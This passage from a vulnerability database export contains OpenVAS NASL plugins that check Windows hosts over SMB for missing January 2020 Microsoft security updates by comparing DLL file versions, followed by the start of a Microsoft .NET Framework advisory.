value:\"https://support.microsoft.com/en-us/help/4556399/kb4556399\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win7:2, win7x64:2, win2008r2:2) <= 0){\n exit(0);\n}\n\nif(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n}\n\n\nkey_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", 
\"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\nforeach key(key_list)\n{\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552940/kb4552940\n ## https://support.microsoft.com/en-us/help/4552920/kb4552920\n ## https://support.microsoft.com/en-us/help/4552919/kb4552919\n ## https://support.microsoft.com/en-us/help/4552921/kb4552921\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36626\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552940/kb4552940\n ## https://support.microsoft.com/en-us/help/4552920/kb4552920\n ## https://support.microsoft.com/en-us/help/4552919/kb4552919\n ## 
https://support.microsoft.com/en-us/help/4552921/kb4552921\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36626\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.identitymodel.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4552940/kb4552940\n ## https://support.microsoft.com/en-us/help/4552920/kb4552920\n ## https://support.microsoft.com/en-us/help/4552919/kb4552919\n ## https://support.microsoft.com/en-us/help/4552921/kb4552921\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4506.8840\"))\n {\n vulnerable_range = \"3.0 - 3.0.4506.8840\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.0\", test_version2:\"4.0.30319.36626\"))\n {\n vulnerable_range = \"4.0 - 4.0.30319.36626\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.6\", test_version2:\"4.7.3619\"))\n {\n vulnerable_range = \"4.6 - 4.7.3619\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4179\"))\n {\n 
vulnerable_range = \"4.8 - 4.8.4179\" ;\n break;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.identitymodel.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n}\nexit(99);\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:31", "description": "This host is missing a critical security\n update according to Microsoft KB4534306", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815745", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815745", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY 
or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815745\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0614\",\n \"CVE-2020-0613\", \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\",\n \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\",\n \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\",\n \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\",\n \"CVE-2020-0646\", \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:03:19 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534306)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534306\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in memory.\n\n - Microsoft Cryptographic Services improperly handles files.\n\n - Microsoft Windows implements predictable memory 
section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Windows Common Log File System (CLFS) driver improperly handles objects\n in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privileges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 for 32-bit Systems\n\n - Microsoft Windows 10 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534306\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.10240.0\", test_version2:\"10.0.10240.18452\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, 
vulnerable_range:\"10.0.10240.0 - 10.0.10240.18452\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:58", "description": "This host is missing a critical security\n update according to Microsoft KB4534293", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534293)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815744", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815744", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815744\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0605\", \"CVE-2020-0646\",\n \"CVE-2020-0640\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 09:01:33 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534293)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534293\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - Microsoft Windows Graphics Component improperly handles objects in 
memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects in memory.\n\n - Win32k component fails to properly handle objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges, disclose\n sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1803 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1803 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please\n see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534293\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.17134.0\", test_version2:\"10.0.17134.1245\")) {\n report = 
report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.17134.0 - 10.0.17134.1245\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:50:56", "description": "This host is missing a critical security\n update according to Microsoft KB4534276", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534276)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815740", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815740", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815740\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0615\", \"CVE-2020-0617\",\n \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0611\", \"CVE-2020-0613\",\n \"CVE-2020-0614\", \"CVE-2020-0620\", \"CVE-2020-0621\", \"CVE-2020-0622\",\n \"CVE-2020-0625\", \"CVE-2020-0626\", \"CVE-2020-0627\", \"CVE-2020-0628\",\n \"CVE-2020-0629\", \"CVE-2020-0630\", \"CVE-2020-0631\", \"CVE-2020-0632\",\n \"CVE-2020-0633\", \"CVE-2020-0634\", \"CVE-2020-0635\", \"CVE-2020-0638\",\n \"CVE-2020-0639\", \"CVE-2020-0644\", \"CVE-2020-0641\", \"CVE-2020-0642\",\n \"CVE-2020-0643\", \"CVE-2020-0606\", \"CVE-2020-0640\", \"CVE-2020-0605\",\n \"CVE-2020-0646\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:48:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534276)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534276\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft Graphics Components improperly handles objects in memory.\n\n - Windows Common Log File System (CLFS) driver fails to properly handle\n objects in memory.\n\n - Windows Search Indexer handles objects in memory.\n\n - Microsoft 
Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to execute arbitrary code, bypass security features, elevate privileges,\n disclose sensitive information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1709 for 32-bit Systems\n\n - Microsoft Windows 10 Version 1709 for x64-based Systems\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534276\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.16299.0\", test_version2:\"10.0.16299.1624\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.16299.0 - 10.0.16299.1624\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", 
"cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-21T19:51:32", "description": "This host is missing a critical security\n update according to Microsoft KB4534271", "cvss3": {}, "published": "2020-01-15T00:00:00", "type": "openvas", "title": "Microsoft Windows Multiple Vulnerabilities (KB4534271)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2020-0609", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0637", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0610", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0612", "CVE-2020-0608"], "modified": "2020-07-17T00:00:00", "id": "OPENVAS:1361412562310815742", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815742", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815742\");\n script_version(\"2020-07-17T05:57:41+0000\");\n script_cve_id(\"CVE-2020-0601\", \"CVE-2020-0607\", \"CVE-2020-0612\", \"CVE-2020-0615\",\n \"CVE-2020-0617\", \"CVE-2020-0623\", \"CVE-2020-0608\", \"CVE-2020-0609\",\n \"CVE-2020-0610\", \"CVE-2020-0611\", \"CVE-2020-0614\", \"CVE-2020-0613\",\n \"CVE-2020-0620\", \"CVE-2020-0622\", \"CVE-2020-0625\", \"CVE-2020-0626\",\n \"CVE-2020-0627\", \"CVE-2020-0628\", \"CVE-2020-0629\", \"CVE-2020-0630\",\n \"CVE-2020-0631\", \"CVE-2020-0632\", \"CVE-2020-0633\", \"CVE-2020-0634\",\n \"CVE-2020-0635\", \"CVE-2020-0637\", \"CVE-2020-0639\", \"CVE-2020-0644\",\n \"CVE-2020-0641\", \"CVE-2020-0642\", \"CVE-2020-0643\", \"CVE-2020-0606\",\n \"CVE-2020-0646\", \"CVE-2020-0640\", \"CVE-2020-0605\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-07-17 05:57:41 +0000 (Fri, 17 Jul 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 08:57:53 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft Windows Multiple Vulnerabilities (KB4534271)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4534271\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Windows Common Log File System (CLFS) driver when it fails to properly\n handle objects in memory.\n\n - Windows Search Indexer improperly handles objects in memory.\n\n - win32k component improperly 
provides kernel information.\n\n - Microsoft Windows Graphics Component improperly handles objects in\n memory.\n\n - Microsoft Windows implements predictable memory section names.\n\n - Windows Media Service allows file creation in arbitrary locations.\n\n - Internet Explorer improperly accesses objects in memory.\n\n - Windows Graphics Device Interface Plus (GDI+) improperly handles objects\n in memory.\n\n - Remote Desktop Web Access improperly handles credential information.\n\n Please see the references for more information about the vulnerabilities.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to execute arbitrary code, elevate privileges, disclose sensitive\n information, conduct denial of service and spoofing attacks.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 10 Version 1607 x32/x64\n\n - Microsoft Windows Server 2016\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4534271\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2016:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\ndllVer = fetch_file_version(sysPath:sysPath, file_name:\"User32.dll\");\nif(!dllVer)\n exit(0);\n\nif(version_in_range(version:dllVer, test_version:\"10.0.14393.0\", 
test_version2:\"10.0.14393.3442\")) {\n report = report_fixed_ver(file_checked:sysPath + \"\\User32.dll\",\n file_version:dllVer, vulnerable_range:\"10.0.14393.0 - 10.0.14393.3442\");\n security_message(data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2021-12-31T15:38:56", "description": "None\nRelease Date: \n**January 14, 2020** Version: \n** .NET Framework 4.8**\n\n## Summary\n\nA remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly. An attacker who successfully exploited this vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights. \n \nTo learn more about the vulnerabilities, go to the following Common Vulnerabilities and Exposures (CVE). \n\n * [CVE-2020-0605](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0605>)\n * [CVE-2020-0606](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/cve-2020-0606>)\n * 